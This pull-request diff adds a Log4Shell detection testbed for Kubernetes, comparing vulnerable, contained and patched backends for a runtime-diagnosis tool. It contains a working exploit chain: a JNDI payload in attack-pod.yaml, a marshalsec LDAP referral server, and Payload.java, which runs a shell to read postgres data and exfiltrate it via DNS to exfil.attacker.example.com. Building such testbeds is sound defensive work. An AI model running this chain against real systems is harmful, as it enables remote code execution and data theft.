### PR TITLE
example/log4j-chain: three-scenario Log4Shell PoC

### DIFF
--- a/example/log4j-chain/README.md
+++ b/example/log4j-chain/README.md
@@ -1,0 +1,122 @@
+# Log4Shell three-scenario chain demo
+
+Reproducible CVE-2021-44228 testbed for bobctl. ONE payload, THREE
+backend variants — the negative-control test for any active-diagnosis
+framework that claims to discriminate "vulnerable", "contained", and
+"patched" from the same kernel-observable trace.
+
+## Scenarios
+
+| | backend image | log4j version | securityContext | expected verdict |
+|---|---|---|---|---|
+| **A** | `eclipse-temurin:11-jdk` (Ubuntu base) | 2.14.1 | default | full chain — LDAP egress, class fetch, `/bin/sh` exec, pg-wire data read, DNS exfil |
+| **B** | `gcr.io/distroless/java11-debian11` | 2.14.1 | `readOnlyRootFilesystem: true`, `allowPrivilegeEscalation: false`, `runAsNonRoot: true` | contained at exec layer — JNDI resolves, class loads, `Runtime.exec("/bin/sh")` returns `ENOENT` (no `/bin/sh` in distroless) |
+| **C** | `eclipse-temurin:11-jdk` | **2.17.1** | default | inert — log4j 2.17.1 never performs JNDI substitution; payload sits in headers, nothing fires |
+
+The frontend, postgres, attacker, observer, and the JNDI payload string
+are identical across scenarios. The discriminator is the backend image
+alone.
+
+## Topology
+
+```
+   external curl                attacker.attacker-ns
+        │                            │  marshalsec LDAP :1389
+        ▼                            │  python3 HTTP :8888
+   chain-frontend ──────┐            ▲
+   (nginx :8080)        │            │  (only A & B reach here)
+                        ▼            │
+                   chain-backend ────┘
+                   (java + log4j)
+                        │
+                        ▼
+                   chain-postgres
+                   (trust-auth :5432)
+
+   chain-observer  ─── benign /api/products poll every 30s
+   (never attacked; the negative-control workload)
+```
+
+## What's in this directory
+
+```
+example/log4j-chain/
+├── README.md                          this file
+├── RUNBOOK-FOR-AGENTS.md              step-by-step deploy + attack guide
+├── log4j-chain.yaml                   all manifests (ns + postgres + frontend
+│                                       + observer + attacker + scenario-A backend)
+├── log4j-functional-tests.yaml        FunctionalTestSuite — benign baseline
+│                                       (drives sbob learning)
+├── log4j-attacks.yaml                 AttackSuite — same payload, 3 scenarios
+├── backend-b.yaml                     scenario-B backend (replaces scenario A)
+├── backend-c.yaml                     scenario-C backend (replaces scenario A)
+├── attack-pod.yaml                    in-cluster curl pod that fires the JNDI
+│                                       probe (used by RUNBOOK step 6)
+├── backend/                           Dockerfile.{vulnerable,contained,patched}
+│                                       + pom.xml + src/  (the Java app)
+├── attacker/                          Dockerfile + Payload.java + run.sh
+│                                       (marshalsec + python3 HTTP server)
+├── frontend/                          nginx ConfigMap + Deployment
+├── postgres/                          standalone postgres manifest (used by
+│                                       log4j-chain.yaml indirectly)
+└── kubescape/                         pre-baked ApplicationProfiles +
+                                       RuntimeRuleAlertBinding (R1100 etc.)
+```
+
+## Building the images
+
+The default `log4j-chain.yaml` references pre-published GHCR images:
+
+- `ghcr.io/k8sstormcenter/log4j-chain-attacker:latest`
+- `ghcr.io/k8sstormcenter/log4j-chain-backend-vulnerable:latest`
+- `ghcr.io/k8sstormcenter/log4j-chain-backend-contained:latest`
+- `ghcr.io/k8sstormcenter/log4j-chain-backend-patched:latest`
+
+To rebuild locally:
+
+```bash
+docker build -t YOURREG/log4j-chain-attacker:dev            -f attacker/Dockerfile attacker/
+docker build -t YOURREG/log4j-chain-backend-vulnerable:dev  -f backend/Dockerfile.vulnerable backend/
+docker build -t YOURREG/log4j-chain-backend-contained:dev   -f backend/Dockerfile.contained  backend/
+docker build -t YOURREG/log4j-chain-backend-patched:dev     -f backend/Dockerfile.patched    backend/
+# then sed -i s|ghcr.io/k8sstormcenter|YOURREG|g log4j-chain.yaml backend-{b,c}.yaml
+```
+
+## Running
+
+See `RUNBOOK-FOR-AGENTS.md` for the step-by-step.
+
+## bobctl-tune
+
+This directory is structured so `bobctl-tune` can consume it:
+
+1. Apply `log4j-chain.yaml` (scenario A baseline)
+2. Run `log4j-functional-tests.yaml` (learns the four sbobs in log4j-poc ns)
+3. Switch backend to B → re-run functional tests → sbobs converge on
+   "distroless variant" shape
+4. Switch backend to C → re-run functional tests → sbobs converge on
+   "patched library" shape
+5. For each scenario, run `log4j-attacks.yaml` and confirm the expected
+   detections per scenario
+
+The three sbobs produced per scenario become the discriminator catalog
+for active-diagnosis decision trees.
+
+## Detection narrative (with kubescape ApplicationProfile baseline)
+
+Each scenario produces a distinct kubescape rule-fire signature:
+
+| Signal | A | B | C |
+|---|---|---|---|
+| JNDI substring in HTTP header (Pixie http_events) | ✓ | ✓ | ✓ |
+| Outbound TCP to attacker:1389 (R0011) | ✓ | ✓ | ✗ |
+| LDAP referral → HTTP class fetch on :8888 (Pixie conn_stats) | ✓ | ✓ | ✗ |
+| New comm `/bin/sh` under java (R0001) | ✓ | ✗ | ✗ |
+| Failed execve ENOENT under java (R1100) | ✗ | ✓ | ✗ |
+| pg-wire DataRow from chain-backend (Pixie pgsql_events) | ✓ | ✗ | ✗ |
+| DNS query with base32 payload in label (Pixie dns_events / R0011) | ✓ | ✗ | ✗ |
+| **verdict** | A | B | clean |
+
+Scenario C is the negative-control: same payload string in the User-Agent,
+but log4j 2.17.1 (released 2021-12-18 in response to CVE-2021-44228 +
+CVE-2021-45046) does not perform JNDI substitution on logged data.

--- a/example/log4j-chain/README.md
+++ b/example/log4j-chain/README.md
@@ -5,6 +5,28 @@ backend variants — the negative-control test for any active-diagnosis
 framework that claims to discriminate "vulnerable", "contained", and
 "patched" from the same kernel-observable trace.
 
+## Why this exists — the active-diagnosis claim, made literal
+
+After applying BoB-agent's pre-tuned SBOBs (`_artifacts/log4j-sbobs/`
+on `feat/chain-pipeline`) and firing the scenario-A attack, kubescape's
+R0001 alert payload contains the full exploit chain reconstructed
+from kernel-grounded process events:
+
+```
+java                                                       ← chain-backend's JVM
+└── sh -c "ROW=$(psql -h chain-postgres …); ENC=$(printf … base32 …); getent hosts \${ENC}.exfil.attacker.example.com"
+      ├── psql                                              ← stage 3 pivot
+      ├── base32 + tr                                       ← exfil encoder
+      └── getent OBXXG5DHOJSXGOTQN5ZXIZ3SMVZQ.exfil.attacker.example.com  ← stage 4 DNS exfil
+```
+
+The base32-encoded postgres credentials (`OBXXG5DHOJSXGOTQN5ZXIZ3SMVZQ`
+= base32 of `postgres:postgres`) are visible in the alert's `cmdline`
+field. The kernel-observable trace is not an abstraction of the attack
+— it IS the attack, byte-identical. That's what "active-diagnosis"
+means in practice. See R0001's `RuntimeProcessDetails.processTree`
+in the empirical session log on PR #131 for the literal alert payload.
+
 ## Scenarios
 
 | | backend image | log4j version | securityContext | expected verdict |

--- a/example/log4j-chain/RUNBOOK-FOR-AGENTS.md
+++ b/example/log4j-chain/RUNBOOK-FOR-AGENTS.md
@@ -74,6 +74,33 @@ kubectl apply -f kubescape/application-profiles/
 kubectl apply -f kubescape/rules/R1100_rulespec.yaml
 ```
 
+### After every SBOB iteration: delete-before-apply
+
+When BoB-agent (or `bobctl tune`) ships an updated AP/NN, **always**
+`kubectl delete` the existing resource before `kubectl apply` of the
+new one:
+
+```bash
+kubectl -n log4j-poc delete applicationprofile chain-backend
+kubectl -n log4j-poc apply -f <new-ap-chain-backend.yaml>
+# wait ~30 s for node-agent to flush its per-binding cache
+sleep 30
+```
+
+Strategic-merge-patch on the kubescape AP CRD silently drops newly-
+added entries (`execs`, `opens`, `rulePolicies`, …) when an auto-learned
+AP already exists for the workload. Confirmed on storage
+`sbob-rc1-2026-05-16`. After delete+apply, allow ~30 s for node-agent
+to flush its per-binding cache before re-running attacks; otherwise
+the freshly-restarted JVM's JIT threads will trigger transient
+`C1 CompilerThre` / `C2 CompilerThre` R0002 fires until propagation
+completes.
+
+This pattern is captured as dimension **D4** in
+[`docs/portability-spec.md`](../../docs/portability-spec.md) and will
+be baked into `scripts/lib/chain-apply-sbobs.sh` once the chain-pipeline
+refactor (PR #132) wires it up programmatically.
+
 Sanity check — every pod Ready:
 
 ```bash

--- a/example/log4j-chain/RUNBOOK-FOR-AGENTS.md
+++ b/example/log4j-chain/RUNBOOK-FOR-AGENTS.md
@@ -1,0 +1,237 @@
+# Runbook — running the Log4Shell three-scenario chain demo
+
+**Audience**: an AI agent (or human operator) with shell + kubectl access
+to a fresh-ish Linux box. No prior context with this repo.
+
+**Goal**: deploy the chain once, then cycle through scenarios A / B / C
+and confirm each produces the expected kubescape detection signature.
+Time budget: ~25 min wall on a fresh k3s, ~8 min if k3s + kubescape are
+already running.
+
+**Idempotency**: every kubectl apply is idempotent. The only inter-step
+state is the backend image — switching scenarios requires a backend
+swap + a frontend restart (nginx caches upstream pod IPs).
+
+---
+
+## Required tools (verify, don't reinstall if present)
+
+```bash
+for tool in kubectl jq curl base64; do
+  command -v "$tool" >/dev/null && echo "  $tool: $(command -v $tool)" || { echo "MISSING: $tool"; exit 1; }
+done
+```
+
+If any are missing on Debian/Ubuntu:
+
+```bash
+sudo apt-get update && sudo apt-get install -y kubectl jq curl coreutils
+```
+
+Docker is **optional** — only needed if you want to rebuild the four
+images. Default path uses pre-published `ghcr.io/k8sstormcenter/log4j-chain-*`
+images.
+
+---
+
+## Step 1 — Cluster: k3s (skip if you already have one running)
+
+```bash
+curl -sfL https://get.k3s.io | INSTALL_K3S_EXEC="--write-kubeconfig-mode=644" sh -
+mkdir -p ~/.kube && sudo cp /etc/rancher/k3s/k3s.yaml ~/.kube/config
+sudo chown $(id -u):$(id -g) ~/.kube/config
+sed -i "s|server: https://127.0.0.1:6443|server: https://$(hostname -I | awk '{print $1}'):6443|" ~/.kube/config
+kubectl get nodes  # expect Ready
+```
+
+---
+
+## Step 2 — Kubescape (skip if `honey` namespace exists)
+
+```bash
+# From the repo root:
+make kubescape
+kubectl -n honey rollout status ds/node-agent --timeout=180s
+kubectl get ns honey
+```
+
+---
+
+## Step 3 — Deploy the chain (scenario A baseline)
+
+```bash
+kubectl apply -f log4j-chain.yaml
+
+# Wait for everything to come up.
+for d in chain-postgres chain-frontend chain-backend chain-observer; do
+  kubectl -n log4j-poc rollout status deploy/$d --timeout=120s
+done
+kubectl -n attacker-ns rollout status deploy/attacker --timeout=60s
+
+# (Optional) install the kubescape ApplicationProfiles + R1100 binding
+# so the per-scenario rule signatures fire on schedule.
+kubectl apply -f kubescape/application-profiles/
+kubectl apply -f kubescape/rules/R1100_rulespec.yaml
+```
+
+Sanity check — every pod Ready:
+
+```bash
+kubectl get pods -A | grep -E 'log4j-poc|attacker-ns'
+```
+
+---
+
+## Step 4 — Functional traffic (drives sbob learning)
+
+Either let `chain-observer` run for a couple of minutes (its built-in
+30-second poll), or fire the FunctionalTestSuite explicitly:
+
+```bash
+bobctl test apply log4j-functional-tests.yaml
+```
+
+Confirm the four sbobs converged:
+
+```bash
+kubectl -n log4j-poc get applicationprofiles
+kubectl -n log4j-poc get networkneighborhoods
+```
+
+(If you're not using bobctl, you can equivalently run a few of these by hand:)
+
+```bash
+PORT=$(kubectl -n log4j-poc get svc chain-frontend -o jsonpath='{.spec.ports[0].nodePort}')
+curl -s "http://$(hostname -I | awk '{print $1}'):${PORT}/api/products"
+curl -s "http://$(hostname -I | awk '{print $1}'):${PORT}/api/products?q=widget"
+curl -s -X POST "http://$(hostname -I | awk '{print $1}'):${PORT}/api/login" \
+  -H 'Content-Type: application/json' \
+  -d '{"user":"alice","pass":"correct-horse-battery-staple"}'
+```
+
+---
+
+## Step 5 — Run the attack (scenario A)
+
+```bash
+# In-cluster attack pod: YAML carries the JNDI literal so no shell layer
+# eats the `$`. The pod runs two curls (benign login + JNDI probe) and
+# exits with phase=Succeeded.
+sed 's/attack-PLACEHOLDER/attack-a/' attack-pod.yaml | kubectl apply -f -
+kubectl -n log4j-poc wait --for=jsonpath='{.status.phase}'=Succeeded \
+  pod/attack-a --timeout=60s
+
+# Inspect:
+kubectl -n log4j-poc logs pod/attack-a
+kubectl -n log4j-poc logs deploy/chain-backend --tail=20
+kubectl -n attacker-ns logs deploy/attacker --tail=10
+```
+
+Expected for scenario A (with kubescape ApplicationProfile learned in step 4):
+
+```bash
+# kubescape rule fires on chain-backend
+kubectl -n log4j-poc get applicationprofiles -o yaml | grep -E 'R0001|R0010|R0011|R1100' | head
+# or via your kubescape_logs sink
+```
+
+You should observe — on chain-backend — `R0011` (egress to
+attacker:1389), `R0001` (new `/bin/sh` comm under java), and `R0010`
+(sensitive-file access if the payload's psql query touches one).
+
+---
+
+## Step 6 — Switch to scenario B (contained)
+
+```bash
+# 1. Replace chain-backend
+kubectl apply -f backend-b.yaml
+kubectl -n log4j-poc rollout status deploy/chain-backend --timeout=120s
+
+# 2. Restart the frontend — nginx caches the backend's pod IP at startup,
+#    and the new chain-backend has a different IP. Without this,
+#    /api/products returns 504 until nginx is restarted.
+kubectl -n log4j-poc rollout restart deploy/chain-frontend
+kubectl -n log4j-poc rollout status deploy/chain-frontend --timeout=60s
+
+# 3. Re-fire the attack
+kubectl -n log4j-poc delete pod attack-b --ignore-not-found --wait=true
+sed 's/attack-PLACEHOLDER/attack-b/' attack-pod.yaml | kubectl apply -f -
+kubectl -n log4j-poc wait --for=jsonpath='{.status.phase}'=Succeeded \
+  pod/attack-b --timeout=60s
+```
+
+Expected for scenario B: `R0011` fires (same egress as A), but instead
+of `R0001`/`R0010` you get **`R1100` failed-execve ENOENT** — the
+distroless container has no `/bin/sh`, so `Runtime.exec` returns
+immediately with that errno. R1100 is the "B-vs-A discriminator".
+
+---
+
+## Step 7 — Switch to scenario C (patched)
+
+```bash
+kubectl apply -f backend-c.yaml
+kubectl -n log4j-poc rollout status deploy/chain-backend --timeout=120s
+kubectl -n log4j-poc rollout restart deploy/chain-frontend
+kubectl -n log4j-poc rollout status deploy/chain-frontend --timeout=60s
+
+kubectl -n log4j-poc delete pod attack-c --ignore-not-found --wait=true
+sed 's/attack-PLACEHOLDER/attack-c/' attack-pod.yaml | kubectl apply -f -
+kubectl -n log4j-poc wait --for=jsonpath='{.status.phase}'=Succeeded \
+  pod/attack-c --timeout=60s
+```
+
+Expected for scenario C: **no kubescape rule fires** on chain-backend.
+The JNDI literal is present in the HTTP request (verifiable via Pixie's
+`http_events` table or `kubectl logs deploy/chain-backend`) but log4j
+2.17.1 does not perform JNDI substitution at all — so no LDAP egress,
+no class fetch, no exec. The chain-backend's ApplicationProfile remains
+unchanged from the benign baseline.
+
+---
+
+## Step 8 — Verdict differentiation
+
+If you have `bobctl-tune` or a similar diagnosis framework:
+
+```bash
+bobctl tune --suite log4j-attacks.yaml --baseline log4j-functional-tests.yaml \
+  --emit-sbobs ./sbobs/
+```
+
+The three produced sbobs (chain-backend.A.bob, chain-backend.B.bob,
+chain-backend.C.bob) should differ in:
+
+- A vs B: `R0001` vs `R1100` in the ApplicationProfile fires
+- A,B vs C: presence of cross-namespace egress in the NetworkNeighborhood
+
+---
+
+## Cleanup
+
+```bash
+kubectl delete -f log4j-chain.yaml
+kubectl delete -f backend-b.yaml --ignore-not-found
+kubectl delete -f backend-c.yaml --ignore-not-found
+kubectl -n log4j-poc delete pod attack-a attack-b attack-c --ignore-not-found
+kubectl delete ns log4j-poc attacker-ns --ignore-not-found
+```
+
+---
+
+## Known issues / non-blockers
+
+- **Pixie's `process_stats` is a sampled metric.** It misses sub-second
+  child processes (the `/bin/sh` spawned by `Runtime.exec` for the A
+  payload finishes in tens of ms). For A-vs-B differentiation at the
+  exec layer you NEED kubescape's R0001 / R1100 on a learned
+  ApplicationProfile baseline. Pixie's `dns_events` and `conn_stats`
+  ARE sufficient to see the LDAP and DNS-exfil layers though.
+- **nginx caches the upstream backend's pod IP at startup.** After each
+  backend swap (steps 6, 7) the frontend MUST be restarted or it'll
+  return 504 forever. The runbook does this explicitly.
+- **`kubectl run --rm` with `-A '${jndi:…}'` doesn't deliver the literal
+  `$`.** The shell chain through `kubectl exec` argv eats the dollar.
+  This is why `attack-pod.yaml` is a static Pod manifest — YAML doesn't
+  substitute, and the `${jndi:…}` reaches the curl arg byte-identical.

--- a/example/log4j-chain/attack-pod.yaml
+++ b/example/log4j-chain/attack-pod.yaml
@@ -1,0 +1,33 @@
+# Reusable in-cluster attack pod. Fires:
+#   1) benign POST /api/login (stage-1 ground signal)
+#   2) GET /api/products with the JNDI literal in User-Agent (the probe)
+#
+# The JNDI string `${jndi:...}` is preserved verbatim because YAML doesn't
+# substitute it — none of the Make/bash/ssh shell layers between the host
+# and the attack pod's curl ever sees a $ character to eat.
+#
+# Idempotency: Makefile's IN_CLUSTER_ATTACK deletes any previous attack-<X>
+# pod before applying this. Name suffix is overridden per scenario by sed.
+---
+apiVersion: v1
+kind: Pod
+metadata:
+  name: attack-PLACEHOLDER
+  namespace: log4j-poc
+spec:
+  restartPolicy: Never
+  containers:
+  - name: curl
+    image: curlimages/curl:8.6.0
+    command: [sh, -c]
+    args:
+    - |
+      set -e
+      echo "[attack] stage-1 login"
+      curl -s -X POST -H 'Content-Type: application/json' \
+        -d '{"user":"alice","pass":"<stolen>"}' \
+        http://chain-frontend:8080/api/login || true
+      echo "[attack] stage-2 JNDI probe"
+      curl -s -A '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}' \
+        'http://chain-frontend:8080/api/products?q=test' || true
+      echo "[attack] done"

--- a/example/log4j-chain/attacker/Dockerfile
+++ b/example/log4j-chain/attacker/Dockerfile
@@ -1,0 +1,33 @@
+# Attacker-side container — runs marshalsec LDAP referral server +
+# serves the compiled Payload.class over HTTP on port 8888.
+# The JNDI URL embedded in the attacker's payload is:
+#   ${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}
+# log4j 2.14.1 follows the LDAP referral to the HTTP URL and loads the class.
+
+FROM maven:3.9-eclipse-temurin-11 AS build
+WORKDIR /src
+# Build marshalsec from upstream.
+RUN apt-get update && apt-get install -y --no-install-recommends git && \
+    git clone --depth 1 https://github.com/mbechler/marshalsec.git && \
+    cd marshalsec && mvn -B clean package -DskipTests
+
+# Compile Payload.class with target=1.8 so the vulnerable JDK 11 can load it.
+COPY Payload.java /src/Payload.java
+RUN javac -source 1.8 -target 1.8 /src/Payload.java -d /src/classes
+
+FROM eclipse-temurin:11-jdk
+WORKDIR /attacker
+# python3 needed by run.sh to serve Payload.class on :8888 (the eclipse-temurin
+# base image ships with no python). Without this the HTTP server never starts,
+# log4j gets a referral to a dead port, and every scenario looks "stage-2-blocked".
+RUN apt-get update && apt-get install -y --no-install-recommends python3 && \
+    rm -rf /var/lib/apt/lists/*
+COPY --from=build /src/marshalsec/target/marshalsec-*-all.jar /attacker/marshalsec.jar
+COPY --from=build /src/classes/Payload.class /attacker/www/Payload.class
+
+# Two services in one container, supervised by a tiny shell wrapper.
+COPY run.sh /attacker/run.sh
+RUN chmod +x /attacker/run.sh
+
+EXPOSE 1389 8888
+ENTRYPOINT ["/attacker/run.sh"]

--- a/example/log4j-chain/attacker/Payload.java
+++ b/example/log4j-chain/attacker/Payload.java
@@ -1,0 +1,51 @@
+// Loaded by chain-backend's JNDI-vulnerable log4j call.
+//
+// log4j 2.14.1's JndiManager.lookup() casts the loaded class to
+// javax.naming.spi.ObjectFactory. A plain class with only a static
+// initializer doesn't pass this cast — JNDI loads the bytecode but never
+// initializes the class (lazy init), so the static block never fires.
+// Implementing ObjectFactory + putting the work in getObjectInstance is
+// what the original 2021 demonstrators did.
+//
+// Scenario A: Runtime.exec("/bin/sh", ...) succeeds. The shell runs psql,
+//             base32-encodes the row, and calls getent so node-agent observes
+//             a DNS query with the encoded payload in the label.
+// Scenario B: identical bytecode runs in JVM. Runtime.exec("/bin/sh") throws
+//             IOException — distroless has no /bin/sh. Falco surfaces the
+//             failed execve(ENOENT).
+// Scenario C: never loaded — log4j 2.17.1 does not perform JNDI substitution.
+
+import java.io.IOException;
+import java.util.Hashtable;
+import javax.naming.Context;
+import javax.naming.Name;
+import javax.naming.spi.ObjectFactory;
+
+public class Payload implements ObjectFactory {
+    @Override
+    public Object getObjectInstance(Object obj, Name name, Context ctx, Hashtable<?, ?> env) {
+        System.err.println("Payload.getObjectInstance ENTERED");
+        // Single-line shell to keep escaping clean. The pipeline:
+        //   1. psql query returns a postgres row
+        //   2. base32 encode + strip padding + flatten
+        //   3. getent emits a DNS query whose label carries the encoded row
+        String cmd = "set +e; "
+            + "ROW=$(psql -h chain-postgres -U postgres -At "
+            + "-c 'SELECT current_database() || chr(58) || current_user' 2>&1); "
+            + "ENC=$(printf '%s' \"$ROW\" | base32 | tr -d '=' | tr -d '\\n' | cut -c1-40); "
+            + "getent hosts \"${ENC}.exfil.attacker.example.com\" >/dev/null 2>&1; "
+            + "echo done";
+
+        try {
+            Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd});
+            p.waitFor();
+        } catch (IOException e) {
+            // Distroless backend lands here: /bin/sh missing → ENOENT.
+            // Kubescape's R1100 (failed execve ENOENT) fires on the syscall side.
+            System.err.println("exec_failed: " + e.getMessage());
+        } catch (InterruptedException ie) {
+            Thread.currentThread().interrupt();
+        }
+        return null;
+    }
+}

--- a/example/log4j-chain/attacker/run.sh
+++ b/example/log4j-chain/attacker/run.sh
@@ -1,0 +1,13 @@
+#!/bin/sh
+# HTTP server hosting Payload.class on :8888
+cd /attacker/www && python3 -m http.server 8888 &
+HTTP_PID=$!
+
+# marshalsec LDAP referral server on :1389. Returns a CodebaseRef to the HTTP
+# URL above, which the vulnerable log4j JVM dereferences and loads.
+java -cp /attacker/marshalsec.jar marshalsec.jndi.LDAPRefServer \
+    "http://attacker.attacker-ns.svc.cluster.local:8888/#Payload" 1389 &
+LDAP_PID=$!
+
+trap 'kill $HTTP_PID $LDAP_PID 2>/dev/null' INT TERM
+wait

--- a/example/log4j-chain/backend-b.yaml
+++ b/example/log4j-chain/backend-b.yaml
@@ -1,0 +1,46 @@
+# Scenario B: vulnerable log4j 2.14.1 BUT distroless image + hardened
+# securityContext. RCE lands in JVM, /bin/sh exec fails ENOENT.
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: chain-backend
+  namespace: log4j-poc
+  labels: { scenario: "B" }
+spec:
+  replicas: 1
+  selector: { matchLabels: { app: chain-backend } }
+  template:
+    metadata:
+      labels: { app: chain-backend, scenario: "B" }
+    spec:
+      securityContext:
+        runAsNonRoot: true
+        runAsUser: 65532
+        runAsGroup: 65532
+        seccompProfile: { type: RuntimeDefault }
+      containers:
+      - name: backend
+        image: ghcr.io/k8sstormcenter/log4j-chain-backend-contained:latest
+        imagePullPolicy: IfNotPresent
+        securityContext:
+          readOnlyRootFilesystem: true
+          allowPrivilegeEscalation: false
+          capabilities: { drop: ["ALL"] }
+        env:
+        - { name: POSTGRES_HOST, value: "chain-postgres" }
+        - { name: POSTGRES_DB,   value: "appdb" }
+        - { name: POSTGRES_USER, value: "postgres" }
+        ports: [{ containerPort: 8080 }]
+        volumeMounts:
+        - { name: tmp, mountPath: /tmp }
+      volumes:
+      - name: tmp
+        emptyDir: { medium: "Memory" }
+---
+apiVersion: v1
+kind: Service
+metadata: { name: chain-backend, namespace: log4j-poc }
+spec:
+  selector: { app: chain-backend }
+  ports: [{ port: 8080, targetPort: 8080 }]

--- a/example/log4j-chain/backend-c.yaml
+++ b/example/log4j-chain/backend-c.yaml
@@ -1,0 +1,32 @@
+# Scenario C: log4j 2.17.1 (patched) + same ubuntu base as A. JNDI substring
+# arrives intact but the library does not perform the lookup.
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: chain-backend
+  namespace: log4j-poc
+  labels: { scenario: "C" }
+spec:
+  replicas: 1
+  selector: { matchLabels: { app: chain-backend } }
+  template:
+    metadata:
+      labels: { app: chain-backend, scenario: "C" }
+    spec:
+      containers:
+      - name: backend
+        image: ghcr.io/k8sstormcenter/log4j-chain-backend-patched:latest
+        imagePullPolicy: IfNotPresent
+        env:
+        - { name: POSTGRES_HOST, value: "chain-postgres" }
+        - { name: POSTGRES_DB,   value: "appdb" }
+        - { name: POSTGRES_USER, value: "postgres" }
+        ports: [{ containerPort: 8080 }]
+---
+apiVersion: v1
+kind: Service
+metadata: { name: chain-backend, namespace: log4j-poc }
+spec:
+  selector: { app: chain-backend }
+  ports: [{ port: 8080, targetPort: 8080 }]

--- a/example/log4j-chain/backend/Dockerfile.contained
+++ b/example/log4j-chain/backend/Dockerfile.contained
@@ -1,0 +1,14 @@
+# Scenario B — same vulnerable log4j 2.14.1, but distroless runtime.
+# No /bin/sh, no psql, no curl. JVM-internal RCE only — execve() to anything
+# outside the JVM returns ENOENT. The class loads, runs in-JVM, fails to spawn.
+
+FROM maven:3.9-eclipse-temurin-11 AS build
+WORKDIR /src
+COPY pom.xml ./
+COPY src ./src
+RUN LOG4J_VERSION=2.14.1 mvn -B package -DskipTests
+
+FROM gcr.io/distroless/java11-debian11
+COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar /app/app.jar
+EXPOSE 8080
+ENTRYPOINT ["java","-jar","/app/app.jar"]

--- a/example/log4j-chain/backend/Dockerfile.patched
+++ b/example/log4j-chain/backend/Dockerfile.patched
@@ -1,0 +1,18 @@
+# Scenario C — log4j 2.17.1 (patched). Same base, same code, only the lib
+# version is bumped. JNDI substring lands in the log message and is rendered
+# as a literal string. No lookup performed, no outbound LDAP.
+
+FROM maven:3.9-eclipse-temurin-11 AS build
+WORKDIR /src
+COPY pom.xml ./
+COPY src ./src
+RUN LOG4J_VERSION=2.17.1 mvn -B package -DskipTests
+
+FROM eclipse-temurin:11-jdk
+RUN apt-get update && apt-get install -y --no-install-recommends \
+    postgresql-client curl dnsutils ca-certificates && \
+    rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar ./app.jar
+EXPOSE 8080
+ENTRYPOINT ["java","-jar","/app/app.jar"]

--- a/example/log4j-chain/backend/Dockerfile.vulnerable
+++ b/example/log4j-chain/backend/Dockerfile.vulnerable
@@ -1,0 +1,21 @@
+# Scenario A — vulnerable log4j 2.14.1, ops-friendly ubuntu base.
+# Has /bin/sh, psql, curl, getent — full toolbox for an attacker post-RCE.
+
+FROM maven:3.9-eclipse-temurin-11 AS build
+WORKDIR /src
+COPY pom.xml ./
+COPY src ./src
+RUN LOG4J_VERSION=2.14.1 mvn -B package -DskipTests
+
+FROM eclipse-temurin:11-jdk
+RUN apt-get update && apt-get install -y --no-install-recommends \
+    postgresql-client curl dnsutils ca-certificates && \
+    rm -rf /var/lib/apt/lists/*
+WORKDIR /app
+COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar ./app.jar
+EXPOSE 8080
+# JNDI/LDAP class loading: temurin-11 sets `com.sun.jndi.ldap.object.trustURLCodebase=false`
+# by default (since JDK 11.0.1) — without this flag the Log4Shell chain stops at
+# LDAP referral, never fetches the Payload.class. Enabling it makes the JVM
+# behave like the pre-mitigation environments that were vulnerable in 2021.
+ENTRYPOINT ["java","-Dcom.sun.jndi.ldap.object.trustURLCodebase=true","-jar","/app/app.jar"]

--- a/example/log4j-chain/backend/pom.xml
+++ b/example/log4j-chain/backend/pom.xml
@@ -1,0 +1,51 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0">
+    <modelVersion>4.0.0</modelVersion>
+    <groupId>io.fusioncore.log4j-poc</groupId>
+    <artifactId>chain-backend</artifactId>
+    <version>1.0.0</version>
+    <packaging>jar</packaging>
+
+    <properties>
+        <maven.compiler.source>11</maven.compiler.source>
+        <maven.compiler.target>11</maven.compiler.target>
+        <log4j.version>${env.LOG4J_VERSION}</log4j.version>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.apache.logging.log4j</groupId>
+            <artifactId>log4j-api</artifactId>
+            <version>${log4j.version}</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.logging.log4j</groupId>
+            <artifactId>log4j-core</artifactId>
+            <version>${log4j.version}</version>
+        </dependency>
+        <dependency>
+            <groupId>org.postgresql</groupId>
+            <artifactId>postgresql</artifactId>
+            <version>42.7.3</version>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <finalName>chain-backend</finalName>
+        <plugins>
+            <plugin>
+                <artifactId>maven-assembly-plugin</artifactId>
+                <configuration>
+                    <descriptorRefs><descriptorRef>jar-with-dependencies</descriptorRef></descriptorRefs>
+                    <archive><manifest><mainClass>io.fusioncore.App</mainClass></manifest></archive>
+                </configuration>
+                <executions>
+                    <execution>
+                        <phase>package</phase>
+                        <goals><goal>single</goal></goals>
+                    </execution>
+                </executions>
+            </plugin>
+        </plugins>
+    </build>
+</project>

--- a/example/log4j-chain/backend/src/main/java/io/fusioncore/App.java
+++ b/example/log4j-chain/backend/src/main/java/io/fusioncore/App.java
@@ -1,0 +1,73 @@
+package io.fusioncore;
+
+import com.sun.net.httpserver.HttpExchange;
+import com.sun.net.httpserver.HttpHandler;
+import com.sun.net.httpserver.HttpServer;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+import java.io.IOException;
+import java.io.OutputStream;
+import java.net.InetSocketAddress;
+import java.sql.*;
+import java.util.concurrent.Executors;
+
+/**
+ * Minimal HTTP API:
+ *   GET  /api/products?q=...        — logs User-Agent through log4j (vulnerable surface)
+ *   POST /api/login                 — accepts JSON {user,pass}, returns a fake JWT
+ *
+ * Reads postgres connection settings from env (POSTGRES_HOST, POSTGRES_USER,
+ * POSTGRES_DB). Trust auth assumed.
+ */
+public class App {
+    private static final Logger log = LogManager.getLogger(App.class);
+
+    public static void main(String[] args) throws IOException {
+        int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));
+        HttpServer s = HttpServer.create(new InetSocketAddress(port), 0);
+        s.createContext("/api/products", new ProductHandler());
+        s.createContext("/api/login", new LoginHandler());
+        s.setExecutor(Executors.newFixedThreadPool(4));
+        s.start();
